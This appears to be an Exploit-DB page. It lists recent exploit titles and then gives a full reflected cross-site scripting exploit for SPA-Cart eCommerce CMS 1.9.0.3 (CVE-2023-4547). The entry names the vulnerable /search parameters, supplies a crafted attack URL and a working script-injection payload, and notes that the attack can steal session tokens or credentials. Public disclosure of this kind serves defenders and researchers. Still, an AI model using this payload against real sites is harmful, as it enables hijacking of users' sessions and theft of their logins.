
18 changes to exploits/shellcodes/ghdb DLINK DPH-400SE - Exposure of Sensitive Information FileMage Gateway 1.10.9 - Local File Inclusion Academy LMS 6.1 - Arbitrary File Upload AdminLTE PiHole 5.18 - Broken Access Control Blood Donor Management System v1.0 - Stored XSS Bus Reservation System 1.1 - Multiple-SQLi Credit Lite 1.5.4 - SQL Injection CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' ) CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery') Hyip Rio 2.1 - Arbitrary File Upload Member Login Script 3.3 - Client-side desync SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS Webedition CMS v2.9.8.8 - Remote Code Execution (RCE) Webedition CMS v2.9.8.8 - Stored XSS Webedition CMS v2.9.8.8 - Remote Code Execution (RCE) Webedition CMS v2.9.8.8 - Stored XSS WP Statistics Plugin 13.1.5 current_page_id - Time based SQL injection (Unauthenticated) Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow Kingo ROOT 1.5.8 - Unquoted Service Path NVClient v5.0 - Stack Buffer Overflow (DoS) Ivanti Avalanche <v6.4.0.0 - Remote Code Execution
39 lines
No EOL
1 KiB
Text
39 lines
No EOL
1 KiB
Text
# Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS
|
|
# Exploit Author: CraCkEr
|
|
# Date: 20/08/2023
|
|
# Vendor: SPA-Cart
|
|
# Vendor Homepage: https://spa-cart.com/
|
|
# Software Link: https://demo.spa-cart.com/
|
|
# Version: 1.9.0.3
|
|
# Tested on: Windows 10 Pro
|
|
# Impact: Manipulate the content of the site
|
|
# CVE: CVE-2023-4547
|
|
# CWE: CWE-79 - CWE-74 - CWE-707
|
|
|
|
|
|
## Greetings
|
|
|
|
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
|
|
CryptoJob (Twitter) twitter.com/0x0CryptoJob
|
|
|
|
|
|
## Description
|
|
|
|
The attacker can send to victim a link containing a malicious URL in an email or instant message
|
|
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
|
|
|
|
|
|
Path: /search
|
|
|
|
GET parameter 'filter[brandid]' is vulnerable to XSS
|
|
GET parameter 'filter[price]' is vulnerable to XSS
|
|
|
|
https://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[XSS]&filter[price]=[XSS]&filter[attr][Memory][]=500%20GB
|
|
|
|
|
|
XSS Payloads:
|
|
|
|
vnxjb"><script>alert(1)</script>bvu51
|
|
|
|
|
|
[-] Done |